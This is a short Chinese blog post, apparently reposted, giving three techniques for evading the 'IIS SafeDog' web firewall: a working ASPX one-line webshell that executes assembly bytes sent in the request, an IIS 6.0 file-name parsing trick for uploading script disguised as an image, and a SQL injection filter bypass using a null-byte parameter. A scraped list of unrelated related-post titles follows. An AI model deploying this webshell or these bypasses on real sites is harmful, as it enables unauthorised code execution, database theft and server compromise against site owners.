1、绕过IIS安全狗的一句话。
 前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
 <%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。

2、IIS6.0解析漏洞遇到安全狗。
 文件名为http://www.web.com/sh3llc0de.asp;1.jpg。
 这样的会被IIS安全狗果断屏蔽。
 改成如下名称,IIS6一样会解析:
 www.web.com/;1.asp;1.jpg

3、安全狗的注入绕过。
 常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
 但如果:
 r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
 就可以成功绕过了。​

转载于:https://blog.51cto.com/findyyy/1017826

突破安全狗防注入及上传的一些思路相关推荐

  1. Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过

    Kali Linux Web 渗透测试视频教程-第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...

  2. 由浅入深,谈谈文件上传的优化思路

    前言 在日常开发中我们少不了接触文件上传的功能,在某些业务场景中甚至需要我们上传较大的文件,如果文件体积比较大,或者网络条件不好时,上传的时间会比较长,用户不能刷新页面,也无法中断上传,只能耐心等待请 ...

  3. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  4. web漏洞(CSRF-SSRF-文件包含-文件解释-文件下载-目录遍历-sql注入-文件上传-反序列化-XSS-XXE-RCE-逻辑越权)

    1.CSRF(跨站请求伪造)(需要对方是在登录的情况下)--主要用于骗转账等等 原理:A在已经登录了银行的网站,并且此时去访问了B所构造的网页添加了特殊代码,A点击了B,由于A已经登录了,就造成了A直 ...

  5. cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修复)

    注入漏洞 注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0 类型: mysql blind-string 错误关键字:onl ...

  6. 加密压缩防360云上传

    思路很简单,主要是压缩包加密码,这样360也无法识别. 现将文件加密压缩,记住是zip格式.用到一个vbs来解压运行. 然后将两个文件再次捆绑为自解压,解压后运行这个vbs VBS代码: On Err ...

  7. 突破asa,cer,cdx,php,aspx 上传

    发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载 尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章 过滤了asa,cer,cdx,php,aspx等脚本类型的上 ...

  8. 金蝶云星空ERP附件上传接口开发思路

    1️⃣ 需求描述:需要通过调用金蝶API接口实现指定单据的附件上传.本文以收料通知单为例,以Java代码示例进行讲解. tips:阅读本文开始前,希望你是一名开发者同时阅读过: https://vip ...

  9. 狗屎java作业 上传就删

    public class bubblesort {public static void main(String[] args) {int[] a = {25,24,12,76,101,96,28};S ...

最新文章

  1. 代码注释//_您应该停止编写//的五个代码注释,并且//应该开始的一个注释
  2. 吴恩达家免费 NLP 课程重磅上线!110 个小视频教你做出聊天机器人,粉丝:我要让娃跟吴恩达姓!...
  3. Spring-AOP @AspectJ进阶之绑定抛出的异常
  4. Android BottomNavigation Demo
  5. 二阶自回归过程matlab,时间序列分析:二阶自回归过程
  6. 用手机「3D探店」是种什么体验?
  7. 女方妈妈和男方爸爸这样告诉即将结婚的儿女,写的真好,希望每个人都可以认真的把它看完...
  8. How To Use Google Logging Library (glog)
  9. Linux网络嗅探器实验报告,C语言实现 Linux 网络嗅探器
  10. 【高等数学笔记】拉格朗日乘数法(Lagrange Multiplier Method):其实也没那么难嘛
  11. zigbee 协调器与终端通信问题
  12. SEO(搜索引擎优化)
  13. 百度前端训练营day2笔记
  14. 导体接地时的静电平衡问题
  15. 如何将MyEclipse项目导入eclipse
  16. easyswoole和mixphp_关于thinkphp5和swoole通过SMTP方式实现异步邮件群发的详解 - easyswoole...
  17. Android studio 生成JavaDoc文档
  18. 如何让两台电脑共享一套鼠标和键盘
  19. Activiti7工作流入门和基本使用-工作流引擎介绍
  20. 递推递归练习H - 三国佚事——巴蜀之危

热门文章

  1. Windows Server 2008 R2模板机制作(VMware Workstation)
  2. 《Tuning I/O Performance》读后笔记
  3. 【Java基础】重写与重载
  4. 服务器状态监控之二软硬件环境介绍
  5. JavaScript获取节点类型、节点名称和节点值
  6. 使用CSS选择器在页面中插入内容
  7. AOP的两种实现方式
  8. 图像有用区域 bfs
  9. 套接字选项SO_LINGER
  10. shell中的变量赋值